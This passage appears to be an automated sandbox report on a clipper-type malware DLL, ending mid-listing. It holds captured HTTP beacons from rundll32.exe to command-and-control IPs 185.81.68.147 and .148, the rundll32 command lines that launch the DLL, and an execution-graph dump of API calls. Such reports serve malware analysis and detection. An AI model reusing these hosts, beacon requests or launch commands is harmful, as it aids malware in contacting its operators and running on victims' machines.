          Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.1049727185.81.68.147806872C:\Windows\SysWOW64\rundll32.exe
          TimestampBytes transferredDirectionData
          Dec 13, 2024 07:56:37.301306009 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.81.68.147
          Content-Length: 5
          Cache-Control: no-cache
          Data Raw: 77 6c 74 3d 31
          Data Ascii: wlt=1
          Dec 13, 2024 07:56:38.691873074 CET711INHTTP/1.1 200 OK
          Date: Fri, 13 Dec 2024 14:56:37 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          X-Powered-By: PHP/8.2.12
          Content-Length: 512
          Content-Type: text/html; charset=UTF-8
          Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
          Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.1049733185.81.68.148806872C:\Windows\SysWOW64\rundll32.exe
          TimestampBytes transferredDirectionData
          Dec 13, 2024 07:56:38.832393885 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.81.68.148
          Content-Length: 5
          Cache-Control: no-cache
          Data Raw: 77 6c 74 3d 31
          Data Ascii: wlt=1
          Dec 13, 2024 07:56:40.220700979 CET711INHTTP/1.1 200 OK
          Date: Fri, 13 Dec 2024 14:56:39 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          X-Powered-By: PHP/8.2.12
          Content-Length: 512
          Content-Type: text/html; charset=UTF-8
          Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
          Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


          Click to jump to process

          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:01:56:26
          Start date:13/12/2024
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
          Imagebase:0x190000
          File size:126'464 bytes
          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:1
          Start time:01:56:26
          Start date:13/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff620390000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:01:56:26
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
          Imagebase:0xd70000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:01:56:26
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:01:56:26
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:6
          Start time:01:56:29
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:7
          Start time:01:56:32
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:9
          Start time:01:56:35
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:10
          Start time:01:56:35
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:11
          Start time:01:56:35
          Start date:13/12/2024
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
          Imagebase:0x6d0000
          File size:61'440 bytes
          MD5 hash:889B99C52A60DD49227C5E485A016679
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Reset < >

            Execution Graph

            Execution Coverage:3.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:3.1%
            Total number of Nodes:737
            Total number of Limit Nodes:22
            execution_graph 9724 6ec416c0 9729 6ec45d90 9724->9729 9726 6ec416d1 9745 6ec46b05 9726->9745 9733 6ec45dae __InternalCxxFrameHandler 9729->9733 9734 6ec45dd4 9729->9734 9730 6ec45ebe 9766 6ec41ec0 9730->9766 9732 6ec45ec3 9789 6ec41e20 9732->9789 9733->9726 9734->9730 9735 6ec45e4d 9734->9735 9736 6ec45e28 9734->9736 9740 6ec467d0 26 API calls 9735->9740 9743 6ec45e39 __InternalCxxFrameHandler 9735->9743 9736->9732 9748 6ec467d0 9736->9748 9740->9743 9741 6ec45eb9 9761 6ec499dc 9741->9761 9743->9741 9744 6ec45ea0 9743->9744 9744->9726 9850 6ec46ad8 9745->9850 9749 6ec467d5 ___std_exception_copy 9748->9749 9750 6ec467ef 9749->9750 9751 6ec49eaa _free 2 API calls 9749->9751 9752 6ec467f1 9749->9752 9750->9743 9751->9749 9753 6ec41e20 Concurrency::cancel_current_task 9752->9753 9755 6ec467fb 9752->9755 9795 6ec47b0e 9753->9795 9757 6ec47b0e CallUnexpected RaiseException 9755->9757 9756 6ec41e3c 9798 6ec47a8c 9756->9798 9759 6ec470a6 9757->9759 9813 6ec49968 9761->9813 9763 6ec499eb 9821 6ec499f9 IsProcessorFeaturePresent 9763->9821 9765 6ec499f8 9839 6ec46751 9766->9839 9790 6ec41e2e Concurrency::cancel_current_task 9789->9790 9791 6ec47b0e CallUnexpected RaiseException 9790->9791 9792 6ec41e3c 9791->9792 9793 6ec47a8c ___std_exception_copy 25 API calls 9792->9793 9794 6ec41e63 9793->9794 9796 6ec47b55 RaiseException 9795->9796 9797 6ec47b28 9795->9797 9796->9756 9797->9796 9799 6ec47a99 ___std_exception_copy 9798->9799 9803 6ec41e63 9798->9803 9802 6ec47ac6 9799->9802 9799->9803 9804 6ec4ae42 9799->9804 9801 6ec4ada7 ___std_exception_destroy 14 API calls 9801->9803 9802->9801 9803->9743 9805 6ec4ae5d 9804->9805 9806 6ec4ae4f 9804->9806 9807 6ec4b686 _free 14 API calls 9805->9807 9806->9805 9811 6ec4ae74 9806->9811 9808 6ec4ae65 9807->9808 9809 6ec499cc ___std_exception_copy 25 API calls 9808->9809 9810 6ec4ae6f 9809->9810 9810->9802 9811->9810 9812 6ec4b686 _free 14 API calls 9811->9812 9812->9808 9814 6ec4b423 _free 14 API calls 9813->9814 9815 6ec49973 9814->9815 9816 6ec49981 9815->9816 9817 6ec499f9 ___std_exception_copy 11 API calls 9815->9817 9816->9763 9818 6ec499cb 9817->9818 9819 6ec49968 ___std_exception_copy 25 API calls 9818->9819 9820 6ec499d8 9819->9820 9820->9763 9822 6ec49a05 9821->9822 9825 6ec49820 9822->9825 9826 6ec4983c CallUnexpected 9825->9826 9827 6ec49868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9826->9827 9828 6ec49939 CallUnexpected 9827->9828 9831 6ec46791 9828->9831 9830 6ec49957 GetCurrentProcess TerminateProcess 9830->9765 9832 6ec46799 9831->9832 9833 6ec4679a IsProcessorFeaturePresent 9831->9833 9832->9830 9835 6ec46b57 9833->9835 9838 6ec46b1a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9835->9838 9837 6ec46c3a 9837->9830 9838->9837 9844 6ec466b0 9839->9844 9842 6ec47b0e CallUnexpected RaiseException 9843 6ec46770 9842->9843 9847 6ec46660 9844->9847 9848 6ec47a8c ___std_exception_copy 25 API calls 9847->9848 9849 6ec4668c 9848->9849 9849->9842 9851 6ec46ae7 9850->9851 9852 6ec46aee 9850->9852 9856 6ec4ab30 9851->9856 9859 6ec4ab9c 9852->9859 9855 6ec416db 9857 6ec4ab9c 28 API calls 9856->9857 9858 6ec4ab42 9857->9858 9858->9855 9860 6ec4abcd 9859->9860 9862 6ec4a8b3 9859->9862 9860->9855 9863 6ec4a8bf ___scrt_is_nonwritable_in_current_image 9862->9863 9870 6ec4b7d4 EnterCriticalSection 9863->9870 9865 6ec4a8cd 9871 6ec4a92d 9865->9871 9867 6ec4a8da 9881 6ec4a902 9867->9881 9870->9865 9872 6ec4a949 9871->9872 9874 6ec4a9c0 _free 9871->9874 9873 6ec4a9a0 9872->9873 9872->9874 9884 6ec4cd7b 9872->9884 9873->9874 9876 6ec4cd7b 28 API calls 9873->9876 9874->9867 9878 6ec4a9b6 9876->9878 9877 6ec4a996 9879 6ec4b90f _free 14 API calls 9877->9879 9880 6ec4b90f _free 14 API calls 9878->9880 9879->9873 9880->9874 9919 6ec4b81c LeaveCriticalSection 9881->9919 9883 6ec4a8eb 9883->9860 9885 6ec4cda3 9884->9885 9886 6ec4cd88 9884->9886 9890 6ec4cdb2 9885->9890 9893 6ec4ed96 9885->9893 9886->9885 9887 6ec4cd94 9886->9887 9889 6ec4b686 _free 14 API calls 9887->9889 9892 6ec4cd99 CallUnexpected 9889->9892 9900 6ec4edc9 9890->9900 9892->9877 9894 6ec4edb6 HeapSize 9893->9894 9895 6ec4eda1 9893->9895 9894->9890 9896 6ec4b686 _free 14 API calls 9895->9896 9897 6ec4eda6 9896->9897 9898 6ec499cc ___std_exception_copy 25 API calls 9897->9898 9899 6ec4edb1 9898->9899 9899->9890 9901 6ec4edd6 9900->9901 9902 6ec4ede1 9900->9902 9912 6ec4b833 9901->9912 9904 6ec4ede9 9902->9904 9910 6ec4edf2 _free 9902->9910 9907 6ec4b90f _free 14 API calls 9904->9907 9905 6ec4edf7 9908 6ec4b686 _free 14 API calls 9905->9908 9906 6ec4ee1c HeapReAlloc 9909 6ec4edde 9906->9909 9906->9910 9907->9909 9908->9909 9909->9892 9910->9905 9910->9906 9911 6ec49eaa _free 2 API calls 9910->9911 9911->9910 9913 6ec4b871 9912->9913 9918 6ec4b841 _free 9912->9918 9915 6ec4b686 _free 14 API calls 9913->9915 9914 6ec4b85c HeapAlloc 9916 6ec4b86f 9914->9916 9914->9918 9915->9916 9916->9909 9917 6ec49eaa _free 2 API calls 9917->9918 9918->9913 9918->9914 9918->9917 9919->9883 9679 6ec47062 9680 6ec47070 9679->9680 9681 6ec4706b 9679->9681 9685 6ec46f2c 9680->9685 9696 6ec47445 9681->9696 9686 6ec46f38 ___scrt_is_nonwritable_in_current_image 9685->9686 9687 6ec46f61 dllmain_raw 9686->9687 9692 6ec46f5c __DllMainCRTStartup@12 9686->9692 9693 6ec46f47 9686->9693 9688 6ec46f7b dllmain_crt_dispatch 9687->9688 9687->9693 9688->9692 9688->9693 9689 6ec46fcd 9690 6ec46fd6 dllmain_crt_dispatch 9689->9690 9689->9693 9691 6ec46fe9 dllmain_raw 9690->9691 9690->9693 9691->9693 9692->9689 9694 6ec46e7a __DllMainCRTStartup@12 84 API calls 9692->9694 9695 6ec46fc2 dllmain_raw 9694->9695 9695->9689 9697 6ec4745b 9696->9697 9699 6ec47464 9697->9699 9700 6ec473f8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9697->9700 9699->9680 9700->9699 10728 6ec45a10 10729 6ec45a64 10728->10729 10730 6ec45a40 10728->10730 10735 6ec45ed0 10729->10735 10732 6ec45d90 36 API calls 10730->10732 10734 6ec45a5a 10732->10734 10738 6ec46771 10735->10738 10743 6ec46705 10738->10743 10741 6ec47b0e CallUnexpected RaiseException 10742 6ec46790 10741->10742 10744 6ec46660 std::exception::exception 25 API calls 10743->10744 10745 6ec46717 10744->10745 10745->10741 9701 6ec4b423 GetLastError 9702 6ec4b440 9701->9702 9703 6ec4b43a 9701->9703 9704 6ec4d09c _free 6 API calls 9702->9704 9722 6ec4b446 SetLastError 9702->9722 9705 6ec4d05d _free 6 API calls 9703->9705 9706 6ec4b45e 9704->9706 9705->9702 9707 6ec4b8b2 _free 12 API calls 9706->9707 9706->9722 9709 6ec4b46e 9707->9709 9710 6ec4b476 9709->9710 9711 6ec4b48d 9709->9711 9712 6ec4d09c _free 6 API calls 9710->9712 9713 6ec4d09c _free 6 API calls 9711->9713 9715 6ec4b484 9712->9715 9714 6ec4b499 9713->9714 9716 6ec4b49d 9714->9716 9717 6ec4b4ae 9714->9717 9720 6ec4b90f _free 12 API calls 9715->9720 9718 6ec4d09c _free 6 API calls 9716->9718 9719 6ec4b0ce _free 12 API calls 9717->9719 9718->9715 9721 6ec4b4b9 9719->9721 9720->9722 9723 6ec4b90f _free 12 API calls 9721->9723 9723->9722 8969 6ec46d20 8970 6ec46d5e 8969->8970 8971 6ec46d2b 8969->8971 9008 6ec46e7a 8970->9008 8973 6ec46d50 8971->8973 8974 6ec46d30 8971->8974 8981 6ec46d73 8973->8981 8976 6ec46d35 8974->8976 8977 6ec46d46 8974->8977 8980 6ec46d3a 8976->8980 8995 6ec468ce 8976->8995 9000 6ec468af 8977->9000 8982 6ec46d7f ___scrt_is_nonwritable_in_current_image 8981->8982 9031 6ec4693f 8982->9031 8984 6ec46d86 __DllMainCRTStartup@12 8985 6ec46e72 8984->8985 8986 6ec46dad 8984->8986 8992 6ec46de9 ___scrt_is_nonwritable_in_current_image CallUnexpected 8984->8992 9047 6ec47288 IsProcessorFeaturePresent 8985->9047 9039 6ec468a1 8986->9039 8989 6ec46e79 8990 6ec46dbc __RTC_Initialize 8990->8992 9042 6ec47490 InitializeSListHead 8990->9042 8992->8980 8993 6ec46dca 8993->8992 9043 6ec46876 8993->9043 9129 6ec4acea 8995->9129 9434 6ec47b99 9000->9434 9003 6ec468b8 9003->8980 9006 6ec468cb 9006->8980 9007 6ec47ba4 21 API calls 9007->9003 9009 6ec46e86 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 9008->9009 9010 6ec46eb7 9009->9010 9011 6ec46f22 9009->9011 9024 6ec46e8f 9009->9024 9454 6ec4690f 9010->9454 9012 6ec47288 __DllMainCRTStartup@12 4 API calls 9011->9012 9016 6ec46f29 ___scrt_is_nonwritable_in_current_image 9012->9016 9014 6ec46ebc 9463 6ec4749c 9014->9463 9018 6ec46f61 dllmain_raw 9016->9018 9019 6ec46f47 9016->9019 9026 6ec46f5c __DllMainCRTStartup@12 9016->9026 9017 6ec46ec1 __RTC_Initialize __DllMainCRTStartup@12 9466 6ec46ab0 9017->9466 9018->9019 9020 6ec46f7b dllmain_crt_dispatch 9018->9020 9019->8980 9020->9019 9020->9026 9024->8980 9025 6ec46fcd 9025->9019 9027 6ec46fd6 dllmain_crt_dispatch 9025->9027 9026->9025 9029 6ec46e7a __DllMainCRTStartup@12 79 API calls 9026->9029 9027->9019 9028 6ec46fe9 dllmain_raw 9027->9028 9028->9019 9030 6ec46fc2 dllmain_raw 9029->9030 9030->9025 9032 6ec46948 9031->9032 9051 6ec470a7 IsProcessorFeaturePresent 9032->9051 9036 6ec46959 9037 6ec4695d 9036->9037 9061 6ec47baf 9036->9061 9037->8984 9123 6ec46978 9039->9123 9041 6ec468a8 9041->8990 9042->8993 9044 6ec4687b ___scrt_release_startup_lock 9043->9044 9045 6ec470a7 IsProcessorFeaturePresent 9044->9045 9046 6ec46884 9044->9046 9045->9046 9046->8992 9048 6ec4729e CallUnexpected 9047->9048 9049 6ec47349 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9048->9049 9050 6ec47394 CallUnexpected 9049->9050 9050->8989 9052 6ec46954 9051->9052 9053 6ec47b7a 9052->9053 9067 6ec48e1c 9053->9067 9056 6ec47b83 9056->9036 9058 6ec47b8b 9059 6ec47b96 9058->9059 9081 6ec48e58 9058->9081 9059->9036 9062 6ec47bc2 9061->9062 9063 6ec47bb8 9061->9063 9062->9037 9064 6ec4804e ___vcrt_uninitialize_ptd 6 API calls 9063->9064 9065 6ec47bbd 9064->9065 9066 6ec48e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9065->9066 9066->9062 9068 6ec48e25 9067->9068 9070 6ec48e4e 9068->9070 9071 6ec47b7f 9068->9071 9085 6ec491c9 9068->9085 9072 6ec48e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9070->9072 9071->9056 9073 6ec4801b 9071->9073 9072->9071 9104 6ec490da 9073->9104 9078 6ec4804b 9078->9058 9080 6ec48030 9080->9058 9082 6ec48e82 9081->9082 9083 6ec48e63 9081->9083 9082->9056 9084 6ec48e6d DeleteCriticalSection 9083->9084 9084->9082 9084->9084 9090 6ec49091 9085->9090 9088 6ec49201 InitializeCriticalSectionAndSpinCount 9089 6ec491ec 9088->9089 9089->9068 9091 6ec490cc 9090->9091 9092 6ec490a9 9090->9092 9091->9088 9091->9089 9092->9091 9096 6ec48ff7 9092->9096 9095 6ec490be GetProcAddress 9095->9091 9101 6ec49003 ___vcrt_FlsSetValue 9096->9101 9097 6ec49077 9097->9091 9097->9095 9098 6ec49019 LoadLibraryExW 9099 6ec49037 GetLastError 9098->9099 9100 6ec4907e 9098->9100 9099->9101 9100->9097 9102 6ec49086 FreeLibrary 9100->9102 9101->9097 9101->9098 9103 6ec49059 LoadLibraryExW 9101->9103 9102->9097 9103->9100 9103->9101 9105 6ec49091 ___vcrt_FlsSetValue 5 API calls 9104->9105 9106 6ec490f4 9105->9106 9107 6ec4910d TlsAlloc 9106->9107 9108 6ec48025 9106->9108 9108->9080 9109 6ec4918b 9108->9109 9110 6ec49091 ___vcrt_FlsSetValue 5 API calls 9109->9110 9111 6ec491a5 9110->9111 9112 6ec4803e 9111->9112 9113 6ec491c0 TlsSetValue 9111->9113 9112->9078 9114 6ec4804e 9112->9114 9113->9112 9115 6ec4805e 9114->9115 9116 6ec48058 9114->9116 9115->9080 9118 6ec49115 9116->9118 9119 6ec49091 ___vcrt_FlsSetValue 5 API calls 9118->9119 9120 6ec4912f 9119->9120 9121 6ec49147 TlsFree 9120->9121 9122 6ec4913b 9120->9122 9121->9122 9122->9115 9124 6ec46984 9123->9124 9125 6ec46988 9123->9125 9124->9041 9126 6ec47288 __DllMainCRTStartup@12 4 API calls 9125->9126 9128 6ec46995 ___scrt_release_startup_lock 9125->9128 9127 6ec469fe 9126->9127 9128->9041 9135 6ec4b2a0 9129->9135 9132 6ec47ba4 9414 6ec47f45 9132->9414 9136 6ec4b2aa 9135->9136 9137 6ec468d3 9135->9137 9143 6ec4d05d 9136->9143 9137->9132 9159 6ec4cefd 9143->9159 9146 6ec4d094 TlsGetValue 9147 6ec4b2b1 9147->9137 9148 6ec4d09c 9147->9148 9149 6ec4cefd _free 5 API calls 9148->9149 9150 6ec4d0b8 9149->9150 9151 6ec4d0d6 TlsSetValue 9150->9151 9152 6ec4b2c4 9150->9152 9153 6ec4b167 9152->9153 9154 6ec4b182 9153->9154 9155 6ec4b172 9153->9155 9154->9137 9173 6ec4b188 9155->9173 9160 6ec4cf2b 9159->9160 9164 6ec4cf27 9159->9164 9160->9164 9166 6ec4ce36 9160->9166 9163 6ec4cf45 GetProcAddress 9163->9164 9165 6ec4cf55 _free 9163->9165 9164->9146 9164->9147 9165->9164 9167 6ec4ce47 ___vcrt_FlsSetValue 9166->9167 9168 6ec4ce65 LoadLibraryExW 9167->9168 9170 6ec4cedb FreeLibrary 9167->9170 9171 6ec4cef2 9167->9171 9172 6ec4ceb3 LoadLibraryExW 9167->9172 9168->9167 9169 6ec4ce80 GetLastError 9168->9169 9169->9167 9170->9167 9171->9163 9171->9164 9172->9167 9174 6ec4b1a3 9173->9174 9175 6ec4b19d 9173->9175 9177 6ec4b90f _free 14 API calls 9174->9177 9176 6ec4b90f _free 14 API calls 9175->9176 9176->9174 9178 6ec4b1af 9177->9178 9179 6ec4b90f _free 14 API calls 9178->9179 9180 6ec4b1ba 9179->9180 9181 6ec4b90f _free 14 API calls 9180->9181 9182 6ec4b1c5 9181->9182 9183 6ec4b90f _free 14 API calls 9182->9183 9184 6ec4b1d0 9183->9184 9185 6ec4b90f _free 14 API calls 9184->9185 9186 6ec4b1db 9185->9186 9187 6ec4b90f _free 14 API calls 9186->9187 9188 6ec4b1e6 9187->9188 9189 6ec4b90f _free 14 API calls 9188->9189 9190 6ec4b1f1 9189->9190 9191 6ec4b90f _free 14 API calls 9190->9191 9192 6ec4b1fc 9191->9192 9193 6ec4b90f _free 14 API calls 9192->9193 9194 6ec4b20a 9193->9194 9205 6ec4afb4 9194->9205 9199 6ec4b90f 9200 6ec4b943 _free 9199->9200 9201 6ec4b91a HeapFree 9199->9201 9200->9154 9201->9200 9202 6ec4b92f 9201->9202 9345 6ec4b686 9202->9345 9206 6ec4afc0 ___scrt_is_nonwritable_in_current_image 9205->9206 9221 6ec4b7d4 EnterCriticalSection 9206->9221 9208 6ec4aff4 9222 6ec4b013 9208->9222 9210 6ec4afca 9210->9208 9212 6ec4b90f _free 14 API calls 9210->9212 9212->9208 9213 6ec4b01f 9214 6ec4b02b ___scrt_is_nonwritable_in_current_image 9213->9214 9226 6ec4b7d4 EnterCriticalSection 9214->9226 9216 6ec4b035 9227 6ec4b255 9216->9227 9218 6ec4b048 9231 6ec4b068 9218->9231 9221->9210 9225 6ec4b81c LeaveCriticalSection 9222->9225 9224 6ec4b001 9224->9213 9225->9224 9226->9216 9228 6ec4b264 _free 9227->9228 9230 6ec4b28b _free 9227->9230 9228->9230 9234 6ec4ddf0 9228->9234 9230->9218 9344 6ec4b81c LeaveCriticalSection 9231->9344 9233 6ec4b056 9233->9199 9235 6ec4de06 9234->9235 9237 6ec4de70 9234->9237 9235->9237 9240 6ec4de39 9235->9240 9244 6ec4b90f _free 14 API calls 9235->9244 9238 6ec4b90f _free 14 API calls 9237->9238 9261 6ec4debe 9237->9261 9239 6ec4de92 9238->9239 9242 6ec4b90f _free 14 API calls 9239->9242 9241 6ec4de5b 9240->9241 9250 6ec4b90f _free 14 API calls 9240->9250 9243 6ec4b90f _free 14 API calls 9241->9243 9245 6ec4dea5 9242->9245 9246 6ec4de65 9243->9246 9249 6ec4de2e 9244->9249 9251 6ec4b90f _free 14 API calls 9245->9251 9252 6ec4b90f _free 14 API calls 9246->9252 9247 6ec4df2c 9253 6ec4b90f _free 14 API calls 9247->9253 9248 6ec4decc 9248->9247 9260 6ec4b90f 14 API calls _free 9248->9260 9262 6ec4e230 9249->9262 9255 6ec4de50 9250->9255 9256 6ec4deb3 9251->9256 9252->9237 9257 6ec4df32 9253->9257 9290 6ec4e32e 9255->9290 9259 6ec4b90f _free 14 API calls 9256->9259 9257->9230 9259->9261 9260->9248 9302 6ec4df61 9261->9302 9263 